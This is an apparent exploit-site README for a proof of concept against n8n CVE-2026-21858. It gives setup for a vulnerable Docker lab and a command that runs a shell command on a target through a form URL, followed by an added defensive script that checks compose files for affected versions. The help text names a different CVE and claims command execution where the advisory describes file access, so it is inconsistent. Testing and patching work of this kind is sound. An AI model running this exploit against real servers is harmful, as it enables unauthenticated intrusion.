## https://sploitus.com/exploit?id=E9FEB96E-FD28-54FD-8CC2-01E853439E7E
# PoC-CVE-2026-21858
> n8n is an open source workflow automation platform. Versions starting with 1.65.0 and below 1.121.0 enable an attacker to access files on the underlying server through execution of certain form-based workflows. A vulnerable workflow could grant access to an unauthenticated remote attacker, resulting in exposure of sensitive information stored on the system and may enable further compromise depending on deployment configuration and workflow usage. This issue is fixed in version 1.121.0.
[https://nvd.nist.gov/vuln/detail/CVE-2026-21858](https://nvd.nist.gov/vuln/detail/CVE-2026-21858)
## Usage
```
❯ python CVE-2026-21858.py -h
usage: CVE-2026-21858.py [-h] --command COMMAND form
PoC exploit: CVE-2026-1357
positional arguments:
form Target form URL
options:
-h, --help show this help message and exit
--command COMMAND Command to run on target
```
## Example
This PoC was written against a barebones n8n workflow to mock a simple file conversion flow:

Clone the repository and create a vulnerable Docker instance:
```bash
mkdir n8n-data
sudo chown -R 1000:1000 n8n-data
docker-compose up -d
```
Once the instance is created, create the workflow shown in the above screenshot. For the `Extract from File` step, you'll need to set the `On Error` setting to `Continue` to allow the workflow to complete. Additionally, set the flow to `Active` in the toolbar.
After creating the flow, install the requirements and launch the exploit:
```bash
pip install -r requirements.txt
python CVE-2026-21858.py http://localhost:5678/form/1d6de4f6-23dc-4163-ad39-a69252189d5e --command "uname -a"
```
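The advisory quoted at the top gives the affected range as 1.65.0 up to but not including 1.121.0. The following defensive check is an added example, not part of this PoC repository: it parses an n8n version string (from `n8n --version` output or an image tag) and scans a docker-compose file for n8n images whose pinned tag falls in that range; unpinned tags such as `latest` are reported as `unknown` because they must be resolved against the running container. The compose text is a constructed sample, not the repository's own `docker-compose.yml`.

```python
import re

# Affected range from the advisory: >= 1.65.0 and < 1.121.0 (fixed in 1.121.0).
FIRST_AFFECTED = (1, 65, 0)
FIXED_IN = (1, 121, 0)

_VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")
_IMAGE_RE = re.compile(r"^\s*image:\s*[\"']?([^\s\"'#]+)", re.MULTILINE)
# Splits an image reference into name and optional tag (a tag never contains '/').
_REF_RE = re.compile(r"^(.*?)(?::([^/:]+))?$")


def parse_version(text):
    """Return (major, minor, patch) from 'n8n --version' output or an image tag, else None."""
    m = _VERSION_RE.match(text.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def is_affected(version):
    """True when a parsed version falls inside the advisory's affected range."""
    return FIRST_AFFECTED <= version < FIXED_IN


def assess_compose(compose_text):
    """Map every n8n image reference in a compose file to 'affected', 'unaffected' or 'unknown'."""
    results = {}
    for ref in _IMAGE_RE.findall(compose_text):
        name, tag = _REF_RE.match(ref).groups()
        if "n8n" not in name.lower():
            continue  # not an n8n image, e.g. the database container
        version = parse_version(tag) if tag else None
        if version is None:
            results[ref] = "unknown"  # unpinned or non-semver tag: check the running container
        else:
            results[ref] = "affected" if is_affected(version) else "unaffected"
    return results


# Constructed sample compose file (not the repository's docker-compose.yml).
SAMPLE_COMPOSE = """
services:
  n8n:
    image: n8nio/n8n:1.100.1
    ports:
      - "5678:5678"
  n8n-staging:
    image: "n8nio/n8n:latest"
  db:
    image: postgres:16
"""

if __name__ == "__main__":
    for ref, status in assess_compose(SAMPLE_COMPOSE).items():
        print(f"{ref}: {status}")
```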

---
This project is provided for educational and research purposes only. The author is not responsible for misuse or damage caused by this code.